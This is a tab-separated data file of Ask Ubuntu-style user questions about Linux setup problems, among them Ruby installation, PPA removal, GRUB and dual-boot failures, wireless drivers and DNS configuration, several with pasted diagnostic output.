330072	how to find and install latest ruby version using rvm ?	i finally got rvm working and now i would like rvm to install the latest stable ruby version . in the tutorial i am using they installed ruby 1.9.3 with command : rvm install 1.9.3 now i want to know if there is a command to download the latest stable version , or do i have to check latest stable version and download it like that , or else , can i download any old version and run an upgrade ? normally i would try out everything , but i am working on a new server and i am trying to set it up as clean as i can : )
330074	'install ' option is missing in ubuntu software center	i am new with linux . recently i installed ubuntu 12.04 lts ( x64 bit ) . when trying to install software from ubuntu software center , the install button on right is missing . also , when i am trying to install compizconfig setting manager , instead of install button there is use this source button . please help me how can i download . it was working fine when i installed it on wubi ( ubuntu 32 bit ) .
330076	restore old installation after new install	after my laptop came back from the customer service ( new keyboard ) i found it was impossible to boot it . i used a livecd to copy all the data in an external memory , then i started a fresh new installation ( i was unable to restore grub ) . i think i made a mistake at this point and repartitioned the disk . then i copied the backup in the new installation . it turned out this does n't work because of mismatches between the old and new partition table . is there a way to restore the system without manually reinstalling all the software ?
330078	mount.nfs : failed to resolve server , address family for hostname not supported error message while mounting ipv6 address	mount.nfs : failed to resolve server fd50:973:3783:49d : c8de : a90a:901f:9c12 : address family for hostname not supported
330085	can i use wubi for manual installation ?	is it possible to use wubi for ubuntu 13.04 ? i read that it will not be supported in the official release due to some problems . is this going to change in the future , and can we expect to see a future release with support for 13.04 ?
330086	ubuntu 12.04 network goes on and off	i have been using ubuntu 12.04 for a long time . i update ubuntu once in a month . the last time i updated networking issues started cropping up . my internet connection disconnects , and after some long amount of time it reconnects . i tried searching a lot and tried some solutions , but none of them works for me . the things that i tried are : editing /etc/resolvconf/resolv.conf.d/head and adding nameservers ( from google and open dns ) - i did this because i found dns resolution itself fails , so i thought this might help . editing /etc/networkmanager/networkmanager.conf turning off dnsmasq . ignoring ipv6 as suggested here . ... but nothing seems to correct it . i have to disable-enable networking to fix the issue .
330090	i ca n't turn off my ubuntu 13.04	i am using a compaq presario c700 . before upgrading from ubuntu 12.10 everything was fine , but since i switched to ubuntu 13.04 , i ca n't shutdown my system in any way . the only thing i could do is hold the power button until it shuts down on its own . i have tried using the terminal to shutdown , but it 's no use . when i click on the shutdown button on the title bar , there is no option for shutdown . the only thing i could see is lock screen and log out . what should i do ?
330093	ca n't connect to a wired connection	i installed ubuntu 13.04 while windows 7 dual booted . i have a local wired cable connection which is working fine with windows 7 , but in the case of ubuntu it is not working . i try to connect using network connections and ipv4 settings , in method option . i use manual and put all the addresses which my internet service provider has given to me , but whenever i am going to save the save ... button grayed out . i have collected some data regarding this issue . using , lspci -nnk | grep -iea3 `` ( network|wireless|ethernet ) '' it shows , 03:00.0 network controller [ 0280 ] : atheros communications inc. ar9285 wireless network adapter ( pci-express ) [ 168c:002b ] ( rev 01 ) subsystem : azurewave aw-nb037h 802.11bgn wireless half-size mini pcie card [ ar9002wb-1ngcd ] [ 1a3b:2c37 ] kernel driver in use : ath9k 04:00.0 usb controller [ 0c03 ] : asmedia technology inc. asm1042 superspeed usb host controller [ 1b21:1042 ] subsystem : asustek computer inc. device [ 1043:1059 ] -- 05:00.0 ethernet controller [ 0200 ] : qualcomm atheros ar8151 v2.0 gigabit ethernet [ 1969:1083 ] ( rev c0 ) subsystem : asustek computer inc. device [ 1043:1851 ] kernel driver in use : atl1c and sudo ifconfig it shows , eth0 link encap : ethernet hwaddr c8:60:00:43 : c7:82 inet6 addr : fe80 : :ca60 : ff : fe43 : c782/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:985 errors:0 dropped:16 overruns:0 frame:0 tx packets:32 errors:0 dropped:0 overruns:0 carrier:1 collisions:0 txqueuelen:1000 rx bytes:71604 ( 71.6 kb ) tx bytes:6652 ( 6.6 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:144 errors:0 dropped:0 overruns:0 frame:0 tx packets:144 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:11744 ( 11.7 kb ) tx bytes:11744 ( 11.7 kb ) wlan0 link encap : ethernet hwaddr 00:08 : ca : f0:51:5a up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) can anyone suggest how i can fix this and connect to my wired connection ?
330094	why does apache2 disable display environment variable ?	is there any configuration file to modify in order to enable the display environment variable before apache2 makes the call to my cgi-script ?
330095	grub problem : 12.04 not booting without usb drive	first of all : this is not a duplicate of the all the `` grub on the wrong hd '' questions . problem : when booting , the system will not boot unless the installer usb flash drive is present . if i boot without the usb drive , the screen goes black after grub lists the different configurations available - so grub is on the correct disk , its what it does next that seems to be the problem . with the usb drive inserted , its access light starts flashing while the system boots in a normal manner . and yes : i have tried booting from the usb drive directly and then i get the `` live '' version , so i have not installed the os on the flash drive by mistake : ) i have tried sudo grub-install /dev/sda and sudo update-grub just for fun , but nothing changed . system in short : ubuntu 12.04 64-bit . i3 processor . uefi bios . 128gb ssd drive . the ssd has a 47 mb efi partition and the rest mounted as '/ ' ( xfs ) .
330096	ubuntu + truecrypt + dropbox + desktop pc with windows 7 + netbook with 12.04	i have two pcs , a netbook running ubuntu 12.04 and a desktop running windows 7 . i use dropbox to share files between the two pcs . i need to encrypt some files , and i have installed truecrypt on both pcs . i can encrypt ( and decrypt ) the files on my desktop pc and i can see the truecrypt file on my netbook , but i do not understand how to decrypt the file i can see on my netbook . and encrypt new files on my netbook to be able to decrypt on my pc . can someone point me to an article or give some information ( simple terms please , i am new to ubuntu and truecrypt ) on how to do this ?
330097	new dsl connection in network manager : what does service mean ?	what does the service field want when creating a new dsl connection ? its purpose is not immediately clear and there is no explanatory tooltip either . isp tech support did n't know what it meant either , and windows did not require the service name when creating a new dsl broadband connection .
330098	secure thunderbird profile with admin rights	the goal is to make sure that , even if somebody is logged into the session , without knowing the password , he can not access thunderbird saved mail . ( on the other side , the hdd content is encrypted ) i thought that the simplest way would be to remove permission for .thunderbird from the user , so that launching thunderbird with access to the profile would require sudo , and similarly access to saved mail via the file manager would require sudo . what would be the setup to do something like this ? i.e. , it requires to also ask for sudo when using chmod or any other means to modify permissions . is it possible to make something like this work ? ( complicated setup is fine as long as usage stays simple ) thanks for any help .
330103	unable to remove a ppa	i had recently added the stormcloud ppa ( ppa : jolicloud-team/ppa ) to my software sources - but it happens to be an empty source and whenever i try to install stormcloud or update my system it gives an error . for example : w : failed to fetch http : //ppa.launchpad.net/cooperjona/stormcloud/ubuntu/dists/precise/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/cooperjona/stormcloud/ubuntu/dists/precise/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . i am unable to remove this ppa - i can not located it in /etc/apt/sources.list , nor can i remote it from the command line . for example , when i do : sudo add-apt-repository -- remove ppa : cooperjona/stormcloud it gives the following error . can not access ppa ( https : //launchpad.net/api/1.0/~cooperjona/+archive/stormcloud ) to get ppa information , please check your internet connection . when i used ppa-purge , i got the following - as a result of which i aborted . $ sudo ppa-purge ppa : jolicloud-team/ppa updating packages lists w : failed to fetch http : //ppa.launchpad.net/cooperjona/stormcloud/ubuntu/dists/precise/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/cooperjona/stormcloud/ubuntu/dists/precise/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . warning : apt-get update failed for some reason ppa to be removed : jolicloud-team ppa comm : file 2 is not in sorted order package revert list generated : awesome/precise jolicloud-daemon/precise jolicloud-desktop-environment/precise jupiter/precise lua-lgi/precise nickel-browser/precise nickel-browser-l10n/precise nickel-codecs-ffmpeg-extra/precise nickel-codecs-ffmpeg-nonfree/precise xsettingsd/precise disabling jolicloud-team ppa from /etc/apt/sources.list.d/jolicloud-team-ppa-precise.list updating packages lists w : failed to fetch http : //ppa.launchpad.net/cooperjona/stormcloud/ubuntu/dists/precise/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/cooperjona/stormcloud/ubuntu/dists/precise/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . warning : apt-get update failed for some reason reading package lists ... done building dependency tree reading state information ... done e : release 'precise ' for 'jolicloud-daemon ' was not found e : release 'precise ' for 'jolicloud-desktop-environment ' was not found e : release 'precise ' for 'jupiter ' was not found e : release 'precise ' for 'nickel-browser ' was not found e : release 'precise ' for 'nickel-browser-l10n ' was not found e : release 'precise ' for 'nickel-codecs-ffmpeg-extra ' was not found e : release 'precise ' for 'nickel-codecs-ffmpeg-nonfree ' was not found e : release 'precise ' for 'xsettingsd ' was not found unable to find an archive `` precise '' for the package `` jolicloud-daemon '' unable to find an archive `` precise '' for the package `` jolicloud-desktop-environment '' unable to find an archive `` precise '' for the package `` jupiter '' unable to find an archive `` precise '' for the package `` nickel-browser '' unable to find an archive `` precise '' for the package `` nickel-browser-l10n '' unable to find an archive `` precise '' for the package `` nickel-codecs-ffmpeg-extra '' unable to find an archive `` precise '' for the package `` nickel-codecs-ffmpeg-nonfree '' unable to find an archive `` precise '' for the package `` xsettingsd '' unable to find an archive `` precise '' for the package `` jolicloud-daemon '' unable to find an archive `` precise '' for the package `` jolicloud-desktop-environment '' unable to find an archive `` precise '' for the package `` jupiter '' unable to find an archive `` precise '' for the package `` nickel-browser '' unable to find an archive `` precise '' for the package `` nickel-browser-l10n '' unable to find an archive `` precise '' for the package `` nickel-codecs-ffmpeg-extra '' unable to find an archive `` precise '' for the package `` nickel-codecs-ffmpeg-nonfree '' unable to find an archive `` precise '' for the package `` xsettingsd '' the following packages will be downgraded : awesome the following new packages will be installed : libev4 { a } the following packages will be removed : feh { u } giblib1 { u } libjpeg-progs { u } libjpeg-turbo-progs { u } lua-lgi { u } 0 packages upgraded , 1 newly installed , 1 downgraded , 5 to remove and 10 not upgraded . need to get 873 kb of archives . after unpacking 575 kb will be freed . the following packages have unmet dependencies : jolicloud-desktop-environment : depends : awesome ( > = 3.5 ) but 3.4.11-1ubuntu1 is to be installed . the following actions will resolve these dependencies : remove the following packages : 1 ) jolicloud-desktop-environment accept this solution ? [ y/n/q/ ? ] n the following actions will resolve these dependencies : keep the following packages at their current version : 1 ) awesome [ 3.5-rc1-8~precise1 ( now ) ] 2 ) feh [ 2.2-1 ( now , precise ) ] 3 ) giblib1 [ 1.2.4-8 ( now , precise ) ] 4 ) libjpeg-turbo-progs [ 1.1.90+svn733-0ubuntu4.1 ( now , precise-updates ) ] 5 ) lua-lgi [ 0.6.2-1ubuntu1~precise1 ( now ) ] accept this solution ? [ y/n/q/ ? ] q it 's not harming my computer or something , but based on my past experiences , i 've learnt a lesson or two regarding faulty ppas , and i do n't want a complete breakdown of my packages . what should i do ? ( i 'm using ubuntu 12.04 lts )
330105	document viewer ( evince ) history navigation	i am satisfied with basic functionality of evince ( 3.4.0 on ubuntu 12.04 ) . unfortunately in this viewer i am really missing history navigation i.e . possibility to go back to previous views and optionally go forward in the viewing history like most of the web browsers have alt+â and alt+â . i think this function is very important when using hyperlinks and searching during browsing . for evince i did not find this function on the standard keyboard shortcuts , in the menu , in the documentation . does evince have this function and how can it be used ? which other pdf viewers maintained for ubuntu have this function ?
330119	permanently change resolution	after an annoying error with my resolution , i finally managed to change it back to normal . but every time i restart my laptop , it changes it back to the 'old ' wrong one . so i have to run the same commands in terminal again to change it back to the correct one . someone in another post came with the idea to put the commands in the startup applications , but i ca n't seem to find the startup applications . i am running lubuntu ( ubuntu 12.04 ) , and i am not so known with it yet . does anyone have an idea how to change the resolution permanently ? graphics card : xavier @ xavier : ~ $ lspci | grep vga 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 09 ) ram : xavier @ xavier : ~ $ grep memtotal /proc/meminfo memtotal : 4063044 kb cpu speed : xavier @ xavier : ~ $ lscpu | grep `` mhz '' cpu mhz : 1000.000
330125	how to set up a dns server on ubuntu server ?	this dns server will use to access a web server/ mysql server . scenario : dns server of 192.168.0.0/24 network - 192.168.0.2 domain name ( dn ) : my.site.com redirect to 192.168.2.1 ( webserver/mysqlserver ) or we may try ( dn ) my2.site.com ** what will be the steps to configure this scenario ? having a dns server , web server / sql server .
330130	change disk ssd . how check which sata version is supported ?	i hava lenovo g580 laptop . i want to change disk to ssd drive , but i 'm not sure if my laptop support sata 3 ( 6gbps ) . i write following output : dmesg | grep sata [ 3.190743 ] ahci 0000:00:1f.2 : ahci 0001.0300 32 slots 6 ports 6 gbps 0x5 impl sata mode [ 3.199450 ] ata1 : sata max udma/133 abar m2048 @ 0xd3617000 port 0xd3617100 irq 43 [ 3.199455 ] ata3 : sata max udma/133 abar m2048 @ 0xd3617000 port 0xd3617200 irq 43 [ 3.518365 ] ata1 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) [ 3.857921 ] ata3 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) is that means i can use ssd disk in sataa 6gbps mode ?
330140	downloading netflix software	just started running my computer off of ubuntu and i 'm trying to download some software that will enable me to watch netflix . i hit ctrl+alt+t and typed in the commands i found here : sudo apt-add-repository ppa : ehoover/compholio & & sudo apt-get update sudo apt-get install netflix-desktop it then asks for my password and has a cursor but will not type anything . not sure what to do next . thank you !
330141	install python in wine	i need to install the windows version python 2.7.5 32bit on my ubuntu box in wine ( because i test euler math toolbox on wine , and this can not use the native python ) . whatever i do , i get the an error at the end of the installation ( see screendump ) . i tried to install `` python.2.7.5.msi '' and even `` winetricks python26 '' . the error is always the same . seems the installer does not work . i did that earlier in another ubuntu system , and it worked . thanks for help ! here is the output of `` winetricks python26 '' rene @ rene-stick : ~/arbeitsfläche $ winetricks python26 executing w_do_call python26 executing load_python26 executing mkdir -p /home/rene/.cache/winetricks/python26 downloading http : //www.python.org/ftp/python/2.6.2/python-2.6.2.msi to /home/rene/.cache/winetricks/python26 -- 2013-08-08 14:47:10 -- http : //www.python.org/ftp/python/2.6.2/python-2.6.2.msi auflösen des hostnamen »www.python.org ( www.python.org ) « ... 82.94.164.162 , 2001:888:2000 : d : :a2 verbindungsaufbau zu www.python.org ( www.python.org ) |82.94.164.162|:80 ... verbunden . http-anforderung gesendet , warte auf antwort ... 200 ok länge : 14536192 ( 14m ) [ application/x-msi ] in »»python-2.6.2.msi«« speichern . 100 % [ ====================================== > ] 14.536.192 683kb/s in 21s 2013-08-08 14:47:32 ( 673 kb/s ) - »»python-2.6.2.msi«« gespeichert [ 14536192/14536192 ] executing mkdir -p /home/rene/.cache/winetricks/python26 downloading http : //downloads.sourceforge.net/project/pywin32/pywin32/build % 20214/pywin32-214.win32-py2.6.exe to /home/rene/.cache/winetricks/python26 -- 2013-08-08 14:47:34 -- http : //downloads.sourceforge.net/project/pywin32/pywin32/build % 20214/pywin32-214.win32-py2.6.exe auflösen des hostnamen »downloads.sourceforge.net ( downloads.sourceforge.net ) « ... 216.34.181.59 verbindungsaufbau zu downloads.sourceforge.net ( downloads.sourceforge.net ) |216.34.181.59|:80 ... verbunden . http-anforderung gesendet , warte auf antwort ... 302 found platz : http : //dfn.dl.sourceforge.net/project/pywin32/pywin32/build % 20214/pywin32-214.win32-py2.6.exe [ folge ] -- 2013-08-08 14:47:34 -- http : //dfn.dl.sourceforge.net/project/pywin32/pywin32/build % 20214/pywin32-214.win32-py2.6.exe auflösen des hostnamen »dfn.dl.sourceforge.net ( dfn.dl.sourceforge.net ) « ... 194.95.248.253 , 2001:638 : d : c101 : acdc:1979:2:1001 verbindungsaufbau zu dfn.dl.sourceforge.net ( dfn.dl.sourceforge.net ) |194.95.248.253|:80 ... verbunden . http-anforderung gesendet , warte auf antwort ... 302 found platz : http : //downloads.sourceforge.net/project/pywin32/pywin32/build % 20214/pywin32-214.win32-py2.6.exe ? download & failedmirror=dfn.dl.sourceforge.net [ folge ] -- 2013-08-08 14:47:34 -- http : //downloads.sourceforge.net/project/pywin32/pywin32/build % 20214/pywin32-214.win32-py2.6.exe ? download & failedmirror=dfn.dl.sourceforge.net wiederverwendung der bestehenden verbindung zu downloads.sourceforge.net:80 . http-anforderung gesendet , warte auf antwort ... 302 found platz : http : //switch.dl.sourceforge.net/project/pywin32/pywin32/build % 20214/pywin32-214.win32-py2.6.exe [ folge ] -- 2013-08-08 14:47:35 -- http : //switch.dl.sourceforge.net/project/pywin32/pywin32/build % 20214/pywin32-214.win32-py2.6.exe auflösen des hostnamen »switch.dl.sourceforge.net ( switch.dl.sourceforge.net ) « ... 130.59.138.21 , 2001:620:0:1b : :21 verbindungsaufbau zu switch.dl.sourceforge.net ( switch.dl.sourceforge.net ) |130.59.138.21|:80 ... verbunden . http-anforderung gesendet , warte auf antwort ... 200 ok länge : 6438204 ( 6,1m ) [ application/octet-stream ] in »»pywin32-214.win32-py2.6.exe«« speichern . 100 % [ ====================================== > ] 6.438.204 588kb/s in 10s 2013-08-08 14:47:45 ( 612 kb/s ) - »»pywin32-214.win32-py2.6.exe«« gespeichert [ 6438204/6438204 ] executing wine msiexec /i python-2.6.2.msi allusers=1 fixme : storage : create_storagefile storage share mode not implemented . fixme : sxs : cache_queryassemblyinfo 0x3ec228 , 0x00000002 , l '' microsoft.vc90.crt , version=\ '' 9.0.21022.8\ '' , publickeytoken=\ '' 1fc8b3b9a1e18e3b\ '' , processorarchitecture=\ '' x86\ '' , type=\ '' win32\ '' '' , 0x32f8c8 fixme : sxs : cache_queryassemblyinfo 0x3ec228 , 0x00000002 , l '' policy.9.0.microsoft.vc90.crt , version=\ '' 9.0.21022.8\ '' , publickeytoken=\ '' 1fc8b3b9a1e18e3b\ '' , processorarchitecture=\ '' x86\ '' , type=\ '' win32-policy\ '' '' , 0x32f8c8 fixme : msi : controlevent_spawnwaitdialog doing nothing err : msi : action_installfiles compressed file was n't installed ( l '' c : \\python26\\lib\\test\\readme.txt '' ) err : msi : iterate_actions execution halted , action l '' installfiles '' returned 1603 err : msi : iterate_actions execution halted , action l '' executeaction '' returned 1603 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- note : command 'wine msiexec /i python-2.6.2.msi allusers=1 ' returned status 67 . aborting . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
330148	how do i do a complete bind9 dns server configuration with a hostname ?	i need a complete step-by-step guide on how to produce such a server configuration . can anyone help-me ?
330150	ca n't boot vista after installing ubuntu 13.04 alongside vista - after boot-repair	have installed ubuntu 13.04 alongside windows vista . i was able to boot either for a while but now only ubuntu - if i select vista from menu it returns to the menu after failing to boot . have tried system repair on vista but does n't correct problem . there must be a simple solution to this - i really do n't want to reinstall vista from old recovery discs . the guys at ubuntu ca n't push this dual use with it failing so easily ! or can they ? have looked at some related problems but no help to me . i ran boot-repair as per forum advice . rebooted but still ca n't get vista . url was http : //paste.ubuntu.com/5962852 ( also sent to boot.repair @ gmail.com )
330153	dual boot windows xp sp2 & ubuntu 12.04	i installed ubuntu 12.04 alongside windows xp sp2 .instead of using the automatic dual boot option , i installed it manually on to a custom partition .after the pc reboots at the gnu grub i can well boot to ubuntu but xp won 't boot at all . the screen just blanks off and returns back to the gnu grub screen . please help.. it will be a great honour thanks sydney..
330154	what exactly is the relationship between apt , dpkg , and .deb files ?	this is a self-explanatory question .
330160	copy arabic files , characters turn `` ? ''	i can write arabic using ubuntu , but now i got this problem : i copied some arabic files ( books and music ) from another hard disk and all the names turned into `` ? ? ? ? ? ? ? ? ? ? .pdf '' what makes it impossible to use them . imagine all your files have these names `` ? ? ? ? ? '' ... right now , i would have to open each file , look for the real name , then rename them one by one . any better idea for this ? can i install any tool , then copy them again ? thank you so much
330164	installed software back-up	i have linux mint 15 mate installed on one pc and i am currently updating it and installing necessary language packs , software , etc . after full set up can i back-up the entire system and restore it on another pc running same version of linux ( mint 15 mate ) ? or at least restore all updated files and software ? i am on limited internet access and traffic is costy : ( thanks in advance
330169	creating new user , inconsistent bash prompt	i 've created a new user profile with : useradd kitty passwd kitty mkdir kitty chmod 0700 kitty chown -r kitty : kitty adduser kitty sudo # when i did it i initially did n't notice i 'm using two different commands , # hence the inconsequence , but as i 've read up there are interchangeable anyway , # just listing it in case it actually makes any difference i 've also created a .bashrc file in kitty 's home folder , with the contents of : export ps1= ' [ \u @ \h \w ] ' initially tab completion did n't work , and the prompt for kitty was a standard $ sign , and altough i 've tampered with /etc/profile /etc/bash.bashrc /etc/bash_completion and created .bashrc in the home directory for both my main user and kitty , i 've ended up reversing all the changes , and only leaving the .bashrc file in the kitty 's home directory . so i guess it was the restart that resolved these isssues ( sic. ) . the problem now is : when i log in as kitty in the terminal window on my main profile , the prompt appears such as my main profile 's , with all the formatting ( color/boldness ) , but when i log in as kitty her native bash prompts have standard formatting . why ? edit : as i 've noticed there is also a slight difference in the content of prompt , the one on my main profile being followed by a $ sign and kitty 's lacking the $ sign and being enclosed in square brackets . i switch between profiles using sudo login and exit in the terminal window . when i log in as kitty at the start of the system , in the terminal it switches between the colored ( logged as my main user ) and standard ( kitty 's ) one . if at the start of the system i log in as my main user it colors both ( kitty 's and main user 's ) in the same manner .
330171	how many bytes in 1 block or 1 inode ?	i 'm trying to specify the amount of disk space for specific user in my ubuntu desktop 12.04 lts system . i manually configure disk quota by editing /etc/fstab and add 2 more option next to the defaults option at the fourth field ( e.g . usrquota and grpquota ) . then i use edquota command to specify the amount of disk space for my user $ edquota -u user after that , new screen has appeared and there are 2 kinds of size for specifying , e.g . blocks and inodes . i 'm unaware of either . i only know the human readable size ( e.g . kb , mb , gb and so on ) . i will be happy if anyone can tell me what does inode means and how much size does it cost ? and how much bytes in 1 block ? thanks .
330175	wireless not detected on toshiba satellite on 12.04 lts	i have installed ubuntu 12.04 on a brand new toshiba satellite c850-1gl . everything seems fine except that it does n't pick up my wireless router . lspci shows no wireless card but i know it 's there as it worked fine under the previous operating system -- windows 8 . it is a realtek card , but i do n't know the exact model . i have searched and found some possible solutions but everything i 've tried has either failed to work or has made the problem worse by disabling the wireless card . so i have gone back to a fresh installation of 12.04 . i have a very basic knowledge of ubuntu so i 'd appreciate a step-by-step guide on how to get the wireless card working . thank you ! here 's the output of lspci : 00:00.0 host bridge : intel corporation ivy bridge dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) 00:1c.2 pci bridge : intel corporation panther point pci express root port 3 ( rev c4 ) 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation panther point 6 port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) here 's the output of sudo lshw -c network : *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 05 serial : 7c:05:07:27:78 : a6 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8105e-1.fw ip=192.168.0.104 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:42 ioport:2000 ( size=256 ) memory : c0004000-c0004fff memory : c0000000-c0003fff i get no results for rfkill list all . lsusb results : bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 004 : id 04f2 : b307 chicony electronics co. , ltd update i just did lspci again after a restart and now the card appears : 02:00.0 network controller : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter ( rev 01 ) 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) i now have a wireless connection option but it 's greyed out with a message below saying `` wireless connection disabled by hardware switch ''
330177	how can i open ms word files in libreoffice ?	i would like to just use ubuntu from now on , i do n't want to go back to windows unless i have to . the problem being , i have a few documents that i need to work on in microsoft word . can someone give me directions on how to open them through ubuntu ?
330183	my monitor keeps going into sleep mode when it reaches the background just before you log in , after booting up	i am using ubuntu 13.04 and it works when i use an lcd television . my graphics card is a geforce 650 ti and my monitor is a hp w1907v . the graphics card works perfectly , the monitor works , the vga cable works . it 's ubuntu . i have tried changing the screen resolutions but it just stays in sleep mode . ( i am currectly using my lcd to work as a second screen so i can see what i am doing ) . i have tried changing stuff like resolutions on my monitor but i ca n't even get onto a menu as it just goes into sleep mode instantly . please help !
330185	firefox changed adress bar search engine from google to wikipedia after update	how do i change it back to google without having to reset everything ?
330187	ubuntu desktop cd iso boot problems	i am attempting to boot from an iso file burned to cd ( yes , did the burn right with an iso burner application ) and ca n't get anywhere . the iso file is the 32bit 12.x available on the ubuntu website . this is the second iso file , the first was used on a usb with identical results . i have successfully swapped to cd boot using f12 . i can access the ubuntu boot menus by hitting any key ... . it seems any choices options all result in the same problem : it displays the ubuntu logo with the white/red dots underneath . dots color cycle about 3-5 times and then it hangs and goes no further . no error message is displayed . computer is a dell inspiron n7010 that had a big windows 7 blowup and without the original disk , i 'm stuck . there is a generic windows install , but without driver support i 'm not going far ( no ethernet , etc ) i did run the `` check the disk '' option and it examined the cd and said everything is fine . n
330188	rhythmbox transcoding alac files on the fly when syncing ipod ( and i do n't want it to ! )	i use rhythmbox from the gnome3 ppa ( not the one from the main repository because of this bug ) on ubuntu 13.04 and i have an ipod nano 4th gen . almost my entire music library is in alac ( apple lossless audio codec ) , which can be played on an ipod . on 12.04 i was able to sync my ipod without problems with rhythmbox . now i can sync my ipod , but i discovered that the music gets converted on the fly to some lossy format ( i presume aac ? ) . i tried to create an .is_audio_player file on the ipod , containing the line output_formats=audio/mp4 , audio/mpeg . but i did n't expect it to solve a lot , as aac and alac are both withing the mp4 container . how could i stop rhythmbox from converting my alac files when i sync my ipod ? ( or should i file a bugreport ? )
330192	uninstalled ubuntu . yet it works	i 've uninstalled ubuntu . yet it works and every time i switch on the computer i get to choose between windows and ubuntu . is formatting my disk the only option i have ?
330194	wireless internet only working sometimes !	i 've recently installed ubuntu on my desktop , wich also has windows 7 . everything , but the wireless internet , is working fine . my wireless internet connection is for some reason only working sometimes . i can always see internet 's and connect to them . but when i 'm connected to my own net , it only work in the beginning . then it does n't , but it 's still connected to the wireless net . when i disconnect and connect to the internet it works again , for at short time , and then it do n't . i 've disabled ipv6 , and that made the internet become faster , when it works . is there anything i can do about this ?
330198	after reinstalling program , titlebar is not works correctly	i reinstalled thunderbird , after reinstalling titlebar is not as default unity 's titlebar . how i can solve this problem ?
330200	lenovo t430s , ubuntu 13.04 , unknown monitor	i have installed ubuntu 13.04 on a lenovo t430s . i connected an external monitor via the vga port ( samsung syncmaster 2443 ) . when i go to the display settings , the monitor appears as `` unknown '' , and the maximum resolution is 1024 x 768 . ( the maximum resolution is 1920 x 1200 on windows 7 . ) i tried turning optimus mode on/off , i tried installing bumblebee , and i tried installing the latest intel drivers through intel-linux-graphics-installer , to no avail . how can i get ubuntu to recognize the monitor and/or enable a higher resolution ?
330216	ppa packages versions	i am developing an open-source java application and want to distribute it for ubuntu ( 12.04+ ) users through a ppa . my app depends on a trove4j library v3+ , but there is only 2.1 version of this library in the official ubuntu precise repository . starting from quantal there is a trove3 package containing required version of the library . i do n't want to make a downgrade to 2.1 version ( because of performance issues in that old version ) . what is the best way to overcome this limitation ? maybe i can make a fork of the official trove3 package in my ppa or just copy trove3 source , change codename etc . and upload it as a separate package to my ppa ?
330219	removing grub after removing ubuntu	actually , i have done something terribly wrong . i did not want ubuntu 13.04 on my pc anymore . i was sick of dual-booting every time the pc starts , and i wanted to return to windows as well . ( my version is windows xp mce sp2 ) . the mistake i did is that i simply used easus partition manager to delete the ubuntu partitions . but what went wrong here is that , even when i did it , the grub keeps trying to load . it says that grub could not be found and finally ends up running grub rescue . i can not `` repair '' my pc using the recovery discs ( containing windows xp mce ) , it only gives me an option to press `` f '' , which will format the hdd to re-install the os . although , the best part is that i can still log in to windows . because , when i boot from the cd 's , it does not give me a `` repair '' option , but only `` format '' and `` quit '' . by using `` quit '' , it takes me straight to windows . but i do not want to keep doing this same thing every time i start my pc . neither do i want to format my hard disk . i have tried a few applications , like easybcd which do nothing . so i want a good solution for it . is their any way to install mbr through windows or maybe ubuntu terminal ? even if i ca n't access ubuntu again ? and what after installing ubuntu again . any safe method to uninstall it ?
